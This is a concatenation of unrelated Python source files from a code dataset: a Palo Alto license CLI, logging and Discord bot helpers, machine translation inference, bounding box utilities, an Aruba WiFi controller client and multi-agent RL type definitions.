l = [x.rstrip('\r\n') for x in lines]
return l
lines = ''.join(lines)
return lines
def parse_opts():
options = {
'activate': False,
'deactivate': False,
'get': False,
'authcode': None,
'cpuid': None,
'uuid': None,
'token': None,
'serial': None,
'key_file': False,
'xml_file': False,
'dst': None,
'api_key': None,
'api_version': None,
'hostname': None,
'ssl': True,
'print_python': False,
'print_json': False,
'debug': 0,
'panrc_tag': None,
'timeout': None,
}
short_options = 'K:V:h:pjDt:T:kx'
long_options = [
'activate', 'deactivate', 'get', 'authcode=',
'cpuid=', 'uuid=', 'token=', 'serial=', 'dst=',
'ssl=',
'version', 'help',
]
try:
opts, args = getopt.getopt(sys.argv[1:],
short_options,
long_options)
except getopt.GetoptError as error:
print(error, file=sys.stderr)
sys.exit(1)
for opt, arg in opts:
if False:
pass
elif opt == '--activate':
options['activate'] = True
elif opt == '--deactivate':
options['deactivate'] = True
elif opt == '--get':
options['get'] = True
elif opt == '--authcode':
options['authcode'] = arg
elif opt == '--cpuid':
options['cpuid'] = arg
elif opt == '--uuid':
options['uuid'] = arg
elif opt == '--token':
options['token'] = process_arg(arg)
elif opt == '--serial':
options['serial'] = arg
elif opt == '-k':
options['key_file'] = True
elif opt == '-x':
options['xml_file'] = True
elif opt == '--dst':
if not os.path.isdir(arg):
print('Invalid --dst: %s' % arg, file=sys.stderr)
sys.exit(1)
options['dst'] = arg
elif opt == '-K':
options['api_key'] = arg
elif opt == '-V':
options['api_version'] = arg
elif opt == '-h':
options['hostname'] = arg
elif opt == '--ssl':
if arg in ['verify', 'noverify']:
if arg == 'noverify':
options['ssl'] = False
elif arg == 'verify':
options['ssl'] = True
else:
print('Invalid --ssl option:', arg)
sys.exit(1)
elif opt == '-p':
options['print_python'] = True
elif opt == '-j':
options['print_json'] = True
elif opt == '-D':
if not options['debug'] < 3:
print('Maximum debug level is 3', file=sys.stderr)
sys.exit(1)
global debug
debug += 1
options['debug'] = debug
elif opt == '-t':
if arg:
options['panrc_tag'] = arg
elif opt == '-T':
options['timeout'] = arg
elif opt == '--version':
print('pan-python', pan.licapi.__version__)
sys.exit(0)
elif opt == '--help':
usage()
sys.exit(0)
else:
assert False, 'unhandled option %s' % opt
if len(args) > 0:
print('Extra options:', args, file=sys.stderr)
sys.exit(1)
if options['debug'] > 2:
s = pprint.pformat(options, indent=INDENT)
print(s, file=sys.stderr)
return options
def usage():
usage = '''%s [options]
--activate activate VM license
--deactivate deactivate VM license
--get get quantity of VM provisioned
--authcode code license auth code
--cpuid id VM-Series vm-cpuid
--uuid id VM-Series vm-uuid
--token token deactivate license token
--serial serial get licenses for serial number
-k write license key files
-x write license install PAN-OS XML API documents
--dst dir destination directory for keys (default .)
-t tag .panrc tagname
-K api_key license API key
-V api_version license API version (default %s)
-h hostname license hostname
-p print JSON response in Python to stdout
-j print JSON to stdout
-D enable debug (multiple up to -DDD)
--ssl opt SSL verify option: verify|noverify
-T seconds HTTP connect timeout
--version display version
--help display usage
'''
print(usage % (os.path.basename(sys.argv[0]),
pan.licapi.DEFAULT_API_VERSION), end='')
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3202827
|
import logging.config
def configure_logger(level: str = "INFO") -> None:
logging.config.dictConfig(
{
"version": 1,
"formatters": {
"colored": {
"()": "colorlog.ColoredFormatter",
"format": "%(log_color)s%(message)s%(reset)s",
}
},
"handlers": {
"termcolor": {
"level": level,
"formatter": "colored",
"class": "logging.StreamHandler",
"stream": "ext://sys.stdout",
}
},
"loggers": {"qwikstart": {"level": level, "handlers": ["termcolor"]}},
}
)
|
StarcoderdataPython
|
121297
|
from torchtext import data
from torch.utils.data import DataLoader
from graph import MTInferBatcher, get_mt_dataset, MTDataset, DocumentMTDataset
from modules import make_translate_infer_model
from utils import tensor_to_sequence, average_model
import torch as th
import argparse
import yaml
max_length = 1024
def run(dev_id, config):
_dataset = config['dataset']
if _dataset == 'iwslt':
TEXT = [data.Field(batch_first=True) for _ in range(2)]
dataset = get_mt_dataset('iwslt')
_, _, test = dataset.splits(exts=('.tc.zh', '.tc.en'), fields=TEXT, root='./data')
test = DocumentMTDataset(test, context_length=config['context_len'])
vocab_zh, vocab_en = dataset.load_vocab(root='./data')
print('vocab size: ', len(vocab_zh), len(vocab_en))
vocab_sizes = [len(vocab_zh), len(vocab_en)]
TEXT[0].vocab = vocab_zh
TEXT[1].vocab = vocab_en
batcher = MTInferBatcher(TEXT, config['doc_max_len'], test.BOS_TOKEN,
graph_type=config['graph_type'], **config.get('graph_attrs', {}))
test_loader = DataLoader(dataset=test,
batch_size=config['test_batch_size'],
collate_fn=batcher,
shuffle=False)
elif _dataset == 'wmt':
TEXT = data.Field(batch_first=True)
dataset = get_mt_dataset('wmt14')
_, _, test = dataset.splits(exts=['.en', '.de'], fields=[TEXT, TEXT], root='./data')
test = MTDataset(test)
vocab = dataset.load_vocab(root='./data')[0]
print('vocab size: ', len(vocab))
vocab_sizes = [len(vocab)]
TEXT.vocab = vocab
batcher = MTInferBatcher(TEXT, config['doc_max_len'], test.BOS_TOKEN,
graph_type=config['graph_type'], **config.get('graph_attrs', {}))
test_loader = DataLoader(dataset=test,
batch_size=config['test_batch_size'],
collate_fn=batcher,
shuffle=False)
elif _dataset == 'multi':
TEXT = [data.Field(batch_first=True) for _ in range(2)]
dataset = get_mt_dataset('multi30k')
_, _, test = dataset.splits(exts=['.en.atok', '.de.atok'], fields=TEXT, root='./data')
test = MTDataset(test)
vocab_en, vocab_de = dataset.load_vocab(root='./data')
print('vocab size: ', len(vocab_en), len(vocab_de))
vocab_sizes = [len(vocab_en), len(vocab_de)]
TEXT[0].vocab = vocab_en
TEXT[1].vocab = vocab_de
batcher = MTInferBatcher(TEXT, config['doc_max_len'], test.BOS_TOKEN,
graph_type=config['graph_type'], **config.get('graph_attrs', {}))
test_loader = DataLoader(dataset=test,
batch_size=config['test_batch_size'],
collate_fn=batcher,
shuffle=False)
dim_model = config['dim_model']
dim_ff = config['dim_ff']
num_heads = config['num_heads']
n_layers = config['n_layers']
m_layers = config['m_layers']
dropouti = config['dropouti']
dropouth = config['dropouth']
dropouta = config['dropouta']
dropoutc = config['dropoutc']
rel_pos = config['rel_pos']
model = make_translate_infer_model(vocab_sizes, dim_model, dim_ff, num_heads,
n_layers, m_layers,
dropouti=dropouti, dropouth=dropouth,
dropouta=dropouta, dropoutc=dropoutc,
rel_pos=rel_pos)
device = th.device(dev_id)
model.load_state_dict(
average_model(['{}-{}.pkl'.format(epoch, config['save_name']) for epoch in range(config['n_epochs'] - 5, config['n_epochs'])]))
model = model.to(device)
model.eval()
if _dataset == 'iwslt':
vocab_trg = vocab_en
elif _dataset == 'wmt':
vocab_trg = vocab
elif _dataset == 'multi':
vocab_trg = vocab_de
for batch in test_loader:
with th.no_grad():
batch.g_enc.edata['etype'] = batch.g_enc.edata['etype'].to(device)
batch.g_enc.ndata['pos'] = batch.g_enc.ndata['pos'].to(device)
batch.g_enc.ndata['x'] = batch.g_enc.ndata['x'].to(device)
for j in range(batcher.k):
batch.g_dec[j].edata['etype'] = batch.g_dec[j].edata['etype'].to(device)
batch.g_dec[j].ndata['pos'] = batch.g_dec[j].ndata['pos'].to(device)
batch.g_dec[j].ndata['x'] = batch.g_dec[j].ndata['x'].to(device)
output = model(batch, vocab_trg.stoi[MTDataset.EOS_TOKEN], sent_max_len=config['sent_max_len'])
for sequence in tensor_to_sequence(vocab_trg.itos, output, batch.n_sent_ctx):
print(sequence)
if __name__ == '__main__':
argparser = argparse.ArgumentParser("machine translation inference")
argparser.add_argument('--config', type=str)
argparser.add_argument('--gpu', type=int, default=0)
args = argparser.parse_args()
with open(args.config, 'r') as f:
config = yaml.load(f)
run(args.gpu, config)
|
StarcoderdataPython
|
1672418
|
#! python3
# factorialLog.py - Learning how to log program events
import logging, os
os.chdir('S:\\Documents\\GitHub\\ATBS\\Chapter_10')
#logging.disable(logging.DEBUG)
logging.basicConfig(filename='myProgramLog.txt', level=logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')
logging.debug('Start of program')
def factorial(n):
logging.debug('Start of factorial(%s)' % (n))
total = 1
# Fixed bug of i starting from 0
for i in range(1, n + 1):
total *= i
logging.debug('i is ' + str(i) + ', total is ' + str(total))
logging.debug('End of factorial(%s)' % (n))
return total
print(factorial(5))
logging.debug('End of program')
|
StarcoderdataPython
|
1795688
|
<gh_stars>1-10
# Imports
import nextcord, json
from nextcord.ext import commands
from nextcord.ui import View, Select, button
from Functions.Embed import *
# Load Options.json as a dict
with open('Settings/Options.json') as Settings:
Options = json.load(Settings)
# Button array for the main help command embed
class HelpView(View):
def __init__(self, ctx:commands.Context):
super().__init__(timeout = 30)
self.ctx = ctx
self.add_item(nextcord.ui.Button(label = "Invite Me", url = Options['InviteLink']))
self.add_item(nextcord.ui.Button(label = "Website", url = Options['Website']))
@button(label = '🗑️', style = nextcord.ButtonStyle.red)
async def delete(self, button: nextcord.ui.Button, interaction: nextcord.Interaction):
"""Delete the interaction"""
await interaction.message.delete()
await self.ctx.message.delete()
async def on_timeout(self):
"""Disable all interactions on timeout"""
try:
for child in self.children:
child.disabled = True
await self.response.edit(view = self)
except: pass
async def interaction_check(self, interaction: nextcord.Interaction):
"""Make it so that only the author can use the interactions"""
return interaction.user.id == self.ctx.author.id
|
StarcoderdataPython
|
3286262
|
from hive.envs.marlgrid import ma_envs
from hive.envs.marlgrid.marlgrid import MarlGridEnv
|
StarcoderdataPython
|
35573
|
import numpy as np
class BoundBox:
"""
Adopted from https://github.com/thtrieu/darkflow/blob/master/darkflow/utils/box.py
"""
def __init__(self, obj_prob, probs=None, box_coord=[float() for i in range(4)]):
self.x, self.y = float(box_coord[0]), float(box_coord[1])
self.w, self.h = float(box_coord[2]), float(box_coord[3])
self.c = 0.
self.obj_prob = obj_prob
self.class_probs = None if probs is None else np.array(probs)
def get_score(self):
return max(self.class_probs)
def get_classindex(self):
return np.argmax(self.class_probs) # class_index = np.argmax(box.classes)
def get_coordinates(self):
return self.x, self.y, self.w, self.h
def overlap(x1, w1, x2, w2):
l1 = x1 - w1 / 2.
l2 = x2 - w2 / 2.
left = max(l1, l2)
r1 = x1 + w1 / 2.
r2 = x2 + w2 / 2.
right = min(r1, r2)
return right - left
def box_intersection(a, b):
w = overlap(a.x, a.w, b.x, b.w)
h = overlap(a.y, a.h, b.y, b.h)
if w < 0 or h < 0: return 0;
area = w * h
return area
def box_union(a, b):
i = box_intersection(a, b)
u = a.w * a.h + b.w * b.h - i
return u
def box_iou(a, b):
# Box intersect over union.
return box_intersection(a, b) / box_union(a, b)
def prob_compare(box):
return box.probs[box.class_num]
def prob_compare2(boxa, boxb):
if (boxa.pi < boxb.pi):
return 1
elif (boxa.pi == boxb.pi):
return 0
else:
return -1
|
StarcoderdataPython
|
1639393
|
<filename>wifinator/aruba.py<gh_stars>0
#!/usr/bin/python3 -tt
# -*- coding: utf-8 -*-
import re
from threading import Lock
from requests import Session, HTTPError
from time import time
from xml.etree.ElementTree import XML, ParseError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.packages.urllib3 import disable_warnings
disable_warnings(InsecureRequestWarning)
class ArubaError(Exception):
"""Generic error related to communication with Aruba WiFi controllers."""
class Aruba(object):
# <url> ? command @@ timestamp & UIDARUBA=session-id
COMMAND_URL = 'https://{host}:4343/screens/cmnutil/execCommandReturnResult.xml'
# POST opcode, url, needxml, uid, passwd
LOGIN_URL = 'https://{host}:4343/screens/wms/wms.login'
def __init__(self, host, username, password):
"""Store address and credentials for later."""
self.host = host
self.username = username
self.password = password
self.session = Session()
self.login_url = self.LOGIN_URL.format(host=host)
self.command_url = self.COMMAND_URL.format(host=host)
def request(self, command):
s = self.session.cookies.get('SESSION', '')
p = '{0}@@{1}&UIDARUBA={2}'.format(command, int(time()), s)
r = self.session.get(self.command_url, verify=False, params=p)
# The controller shamelessly retains ASCII control characters and
# some users are able to inject them through their login names.
data = re.sub(b'[\x00-\x09\x11-\x12\x14-\x1f]',
lambda m: ('\\x%.2x' % m.group(0)[0]).encode('utf8'),
r.text.encode('utf8', 'xmlcharrefreplace'))
if data:
try:
return XML(data)
except ParseError:
raise ArubaError('Response is not a valid XML element')
def request_table(self, command):
r = self.request(command)
if r.find('t') is None:
raise ArubaError('Response does not contain a table')
return [[(c.text.strip() if c.text is not None else '') for c in row] \
for row in r.find('t')[1:]]
def request_dict(self, command):
return {row[0]: row[1] for row in self.request_table(command)}
def login(self):
if self.request('show roleinfo').find('data'):
return
r = self.session.post(self.login_url, verify=False, data={
'opcode': 'login',
'url': '/',
'needxml': '0',
'uid': self.username,
'passwd': <PASSWORD>,
})
if 'Authentication complete' not in r.text:
raise ArubaError('Login failed')
def list_profiles(self):
"""List service profiles with SSID and Beacon settings."""
profiles = {}
for name in self.request_dict('show wlan ssid-profile'):
detail = self.request_dict('show wlan ssid-profile ' + name)
profiles[name] = {
'ssid': detail['ESSID'],
'active': detail['SSID enable'] == 'Enabled',
}
return profiles
def list_stations(self):
"""List client stations with MAC addresses and more."""
stations = {}
r = self.request_table('show station-table')
for mac, name, role, age, auth, ap, essid, phy, remote, profile in r:
stations[mac] = {
'mac': mac,
'name': name,
'role': role,
'age': age,
'auth': auth,
'ap': ap,
'essid': essid,
'phy': phy,
'remote': remote,
'profile': profile,
}
return stations
def essid_stats(self):
stats = {}
for station in self.list_stations().values():
essid = station['essid']
stats.setdefault(essid, 0)
stats[essid] += 1
return stats
def ap_stats(self):
stats = {}
for station in self.list_stations().values():
ap = station['ap']
stats.setdefault(ap, 0)
stats[ap] += 1
return stats
def edit_profile(self, profile, ssid, psk, active):
"""Adjust service profile. PSK is in plain text."""
self.request('wlan ssid-profile {0} essid {1}'.format(profile, ssid))
self.request('wlan ssid-profile {0} wpa-passphrase {1}'.format(profile, psk))
if active:
self.request('wlan ssid-profile {0} ssid-enable'.format(profile))
else:
self.request('wlan ssid-profile {0} no ssid-enable'.format(profile))
# vim:set sw=4 ts=4 et:
|
StarcoderdataPython
|
53271
|
import enum
import time
from collections import namedtuple
from dataclasses import dataclass, field
from typing import List, Dict, Any, Union, Tuple, Sequence, Callable, Optional
import gym
import numpy as np
from malib.utils.notations import deprecated
""" Rename and definition of basic data types which are correspond to the inputs (args, kwargs) """
PolicyConfig = Dict[str, Any]
MetaPolicyConfig = Tuple[gym.spaces.Space, gym.spaces.Space, Sequence[PolicyConfig]]
EnvConfig = Dict[str, Any]
RolloutConfig = Dict[str, Any]
ParameterLibConfig = Dict[str, Any]
DatasetConfig = Dict[str, Any]
TrainingConfig = Dict[str, Any]
ModelConfig = Dict[str, Any]
AgentConfig = Dict[str, TrainingConfig]
AgentID = str
PolicyID = str
EnvID = str
EpisodeID = str
DataBlockID = str
DataTransferType = np.ndarray
EnvObservationType = Any
# next_observation, rewards, done, infos
StandardEnvReturns = Tuple[
Dict[str, DataTransferType],
Dict[str, float],
Dict[str, bool],
Dict[str, Any],
]
# TODO(ming): mute info temporally to avoid data transferring errors
StandardTransition = namedtuple(
# "StandardTransition", "obs, new_obs, action, reward, done, info"
"StandardTransition",
"obs, new_obs, actions, rewards, dones",
)
ObservationSpaceType = gym.spaces.Space
ActionSpaceType = gym.spaces.Space
""" For task categorical and status tagging """
class TaskType(enum.Enum):
ASYNC_LEARNING = "async_learning"
ADD_WORKER = "add_worker"
SAVE_MODEL = "save_model"
LOAD_MODEL = "load_model"
OPTIMIZE = "optimization"
ROLLOUT = "rollout"
UPDATE_PARAMETER = "update_PARAMETER"
PULL_PARAMETER = "pull_parameter"
PUSH_PARAMETER = "push_parameter"
SAMPLE_BATCH = "sample_batch"
PUSH_SAMPLES = "push_samples"
NO = "no"
TRAINING_EVALUATE = "evaluate_for_training"
ROLLOUT_EVALUATE = "evaluate_for_rollouts"
ADD_POLICY = "add_policy"
UPDATE_POPULATION = "update_population"
EVALUATE = "evaluate"
EVALUATE_WRITE_BACK = "evaluate_write_back"
INIT = "initialization"
CHECK_ADD = "check_add"
TERMINATE = "terminate"
SIMULATION = "simulation"
UPDATE_PAYOFFTABLE = "update_payofftable"
class Status(enum.Enum):
TERMINATE = "terminate"
NORMAL = "normal"
LOCKED = "locked"
WAITING = "waiting"
SUCCESS = "success"
IDLE = "idle"
IN_PROGRESS = "in progress"
EXCEED = "exceed"
FAILED = "failed"
class Paradigm(enum.Enum):
MARL = "marl"
META_GAME = "meta_game"
class BehaviorMode(enum.IntEnum):
"""Behavior mode, indicates environment agent behavior"""
EXPLORATION = 0
"""Trigger exploration mode"""
EXPLOITATION = 1
"""Trigger exploitation mode"""
class MetricType:
REWARD = "reward"
"""Reward"""
LIVE_STEP = "live_step"
"""Agent live step"""
REACH_MAX_STEP = "reach_max_step"
"""Whether reach max step or not"""
Parameter = Any
""" Description: """
@dataclass
class ParameterDescription:
class Type:
PARAMETER = "parameter"
GRADIENT = "gradient"
time_stamp: float
identify: str # meta policy id
env_id: str
id: PolicyID
type: str = Type.PARAMETER
lock: bool = False
description: Any = None
data: Parameter = None
parallel_num: int = 1
version: int = -1
@classmethod
def gen_template(cls, **kwargs):
return cls(
time_stamp=time.time(),
identify=kwargs.get("identify", None),
id=kwargs["id"],
lock=kwargs.get("lock", True),
env_id=kwargs.get("env_id", "test"),
type=kwargs.get("type", cls.Type.PARAMETER),
data=kwargs.get("data", None),
description=kwargs.get(
"description",
{
"registered_name": "test",
"observation_space": None,
"action_space": None,
"model_config": {},
"custom_config": {},
},
),
)
@dataclass
class MetaParameterDescription:
meta_pid: PolicyID
parameter_desc_dict: Dict[PolicyID, ParameterDescription]
timestamp: float = time.time()
identify: str = "MetaParameterDescription" # meta policy id
def __post_init__(self):
self.identify = f"{self.identify}_mpid_{self.meta_pid}_{self.timestamp}"
@classmethod
def gen_template(cls, **kwargs):
return cls(
meta_pid=kwargs["meta_pid"],
parameter_desc_dict={
k: ParameterDescription.gen_template(id=k) for k in kwargs["pids"]
},
)
@dataclass
class BufferDescription:
env_id: str
agent_id: Union[AgentID, List[AgentID]]
policy_id: Union[PolicyID, List[PolicyID]]
batch_size: int = 0
sample_mode: str = ""
indices: List[int] = None
data: Any = None
data_shapes: Dict[str, Tuple] = None
sample_start_size: int = 0
capacity: int = 1000
identify: str = None
def __post_init__(self):
if self.identify is None:
self.identify = "_".join(sorted(self.agent_id))
def __str__(self):
return "<BufferDescription: agent_id={} policy_id={}".format(
self.agent_id, self.policy_id
)
@dataclass
class AgentInvolveInfo:
"""`AgentInvolveInfo` describes the trainable pairs, populations, environment id and the
meta parameter descriptions.
"""
training_handler: str
trainable_pairs: Dict[AgentID, Tuple[PolicyID, PolicyConfig]]
""" describe the environment agent id and their binding policy configuration """
populations: Dict[AgentID, Sequence[Tuple[PolicyID, PolicyConfig]]]
""" describe the policy population of agents """
env_id: str = None
""" environment id """
meta_parameter_desc_dict: Dict[AgentID, MetaParameterDescription] = None
""" meta parameter description """
@classmethod
def gen_template(
cls,
agent_ids: List[AgentID],
observation_space: gym.Space,
action_space: gym.Space,
):
example_ptup = (
"policy_0",
{
"registered_name": "test",
"observation_space": observation_space,
"action_space": action_space,
"mode_config": None,
"custom_config": None,
},
)
return cls(
training_handler="test",
trainable_pairs=dict.fromkeys(agent_ids, example_ptup),
populations=dict.fromkeys(agent_ids, [example_ptup]),
env_id="test",
meta_parameter_desc_dict=dict.fromkeys(
agent_ids,
MetaParameterDescription.gen_template(meta_pid=None, pids=["policy_0"]),
),
)
@dataclass
class TrainingDescription:
agent_involve_info: AgentInvolveInfo
stopper: str = "none"
stopper_config: Dict[str, Any] = field(default_factory=dict)
policy_distribution: Dict[AgentID, Dict[PolicyID, float]] = None
update_interval: int = 1
batch_size: int = 64
mode: str = "step"
time_stamp: float = time.time()
@classmethod
def gen_template(cls, **template_attr_kwargs):
raise NotImplementedError
@dataclass
class RolloutDescription:
agent_involve_info: AgentInvolveInfo
fragment_length: int
num_episodes: int
episode_seg: int
terminate_mode: str
mode: str # on_policy or off_policy or imitation learning ?
# parameter_desc_seq: Sequence[MetaParameterDescription] = None
callback: Union[str, Callable] = "sequential"
stopper: str = "none"
stopper_config: Dict[str, Any] = field(default_factory=dict)
policy_distribution: Dict[AgentID, Dict[PolicyID, float]] = None
time_stamp: float = time.time()
@classmethod
def gen_template(cls, **template_attr_kwargs):
agent_involve_info_kwargs = template_attr_kwargs.pop("agent_involve_info")
instance = cls(
agent_involve_info=AgentInvolveInfo.gen_template(
**agent_involve_info_kwargs
),
policy_distribution=dict.fromkeys(
agent_involve_info_kwargs["agent_ids"], {"policy_0": 1.0}
),
**template_attr_kwargs,
)
template_attr_kwargs["agent_involve_info"] = agent_involve_info_kwargs
return instance
@dataclass
class SimulationDescription:
agent_involve_info: AgentInvolveInfo
policy_combinations: List[Dict[AgentID, Tuple[PolicyID, PolicyConfig]]]
num_episodes: int
callback: Union[str, Callable] = "sequential"
max_episode_length: int = None
time_stamp: float = time.time()
@classmethod
def gen_template(cls, **kwargs):
agent_involve_template_attrs = kwargs.pop("agent_involve_info")
instance = cls(
agent_involve_info=AgentInvolveInfo.gen_template(
**agent_involve_template_attrs
),
**kwargs,
)
kwargs["agent_involve_info"] = agent_involve_template_attrs
return instance
@dataclass
class TrainingFeedback:
agent_involve_info: AgentInvolveInfo
statistics: Dict[AgentID, Any]
@dataclass
class RolloutFeedback:
"""RolloutFeedback for rollout tasks"""
worker_idx: str
"""id of rollout worker"""
agent_involve_info: AgentInvolveInfo
"""agent involve info describes the ..."""
statistics: Dict[str, Any]
policy_combination: Dict[PolicyID, PolicyID] = None
def __post_init__(self):
pass
# for res in self.statistics.values():
# for k, v in res.items():
# if isinstance(v, MetricEntry):
# res[k] = v.value
@deprecated
@dataclass
class EvaluationFeedback:
# env_id: str
agent_involve_info: AgentInvolveInfo
statistics: Dict[PolicyID, Dict[str, Any]]
policy_combination: Dict[PolicyID, Tuple[PolicyID, PolicyConfig]]
@dataclass
class TaskDescription:
"""TaskDescription is a general description of
Training, Rollout and Simulation tasks.
"""
task_type: TaskType
"""task type used to identify which task description will be used"""
content: Union[TrainingDescription, RolloutDescription, SimulationDescription]
"""content is a detailed task description entity"""
state_id: Any
timestamp: float = None
source_task_id: str = None
identify: str = None
def __post_init__(self):
timestamp = time.time()
self.timestamp = timestamp
if self.task_type == TaskType.OPTIMIZE:
prefix = "TrainingDescription"
elif self.task_type == TaskType.ROLLOUT:
prefix = "RolloutDescription"
elif self.task_type == TaskType.SIMULATION:
prefix = "SimulationDescription"
else:
prefix = "UnknowDescription"
self.identify = f"{prefix}_{timestamp}"
@classmethod
def gen_template(cls, **template_attr_kwargs):
task_type = template_attr_kwargs["task_type"]
if task_type == TaskType.OPTIMIZE:
desc_cls = TrainingDescription
elif task_type == TaskType.ROLLOUT:
desc_cls = RolloutDescription
elif task_type == TaskType.SIMULATION:
desc_cls = SimulationDescription
else:
raise ValueError("Unknow task type: {}".format(task_type))
content_template_attr_kwargs = template_attr_kwargs.pop("content")
instance = cls(
content=desc_cls.gen_template(**content_template_attr_kwargs),
**template_attr_kwargs,
)
template_attr_kwargs["content"] = content_template_attr_kwargs
return instance
@dataclass
class TaskRequest:
"""TaskRequest is a description of"""
task_type: TaskType
"""defines the requested task type"""
content: Any
"""content is the feedback of current handler which request for next task"""
state_id: str
timestamp: float = None # time.time()
identify: str = None
computing_mode: str = "bulk_sync" # bulk_sync, async
def __post_init__(self):
assert self.state_id, "State id cannot be None"
timestamp = time.time()
self.timestamp = timestamp
self.identify = f"TaskRequest_{timestamp}"
@staticmethod
def from_task_desc(task_desc: TaskDescription, **kwargs) -> "TaskRequest":
return TaskRequest(
task_type=kwargs.get("task_type", task_desc.task_type),
content=kwargs.get("content", task_desc.content),
state_id=kwargs.get("state_id", task_desc.state_id),
timestamp=kwargs.get("timestamp", None),
identify=kwargs.get("identify", None),
)
class BColors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKCYAN = "\033[96m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
class EvaluateResult:
CONVERGED = "converged"
AVE_REWARD = "average_reward"
REACHED_MAX_ITERATION = "reached_max_iteration"
@staticmethod
def default_result():
return {
EvaluateResult.CONVERGED: False,
EvaluateResult.AVE_REWARD: -float("inf"),
EvaluateResult.REACHED_MAX_ITERATION: False,
}
class TrainingMetric:
LOSS = "loss"
@dataclass
class BatchMetaInfo:
episode_id: str
created_time: float
meta_policy_id: str = None
policy_id: str = None
env_id: Any = None
policy_type: Any = None
class ExperimentManagerTableName:
primary: str = ""
secondary: str = ""
tag: str = ""
key: int = 0
nid: int = 0
class EventReportStatus:
START = "start"
END = "end"
# TODO(jing): add docs for MetricEntry
class MetricEntry:
def __init__(self, value: Any, agg: str = "mean", tag: str = "", log: bool = True):
self.value = value
self.agg = agg
self.tag = tag
self.log = log
def cleaned_data(self):
"""Return values"""
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.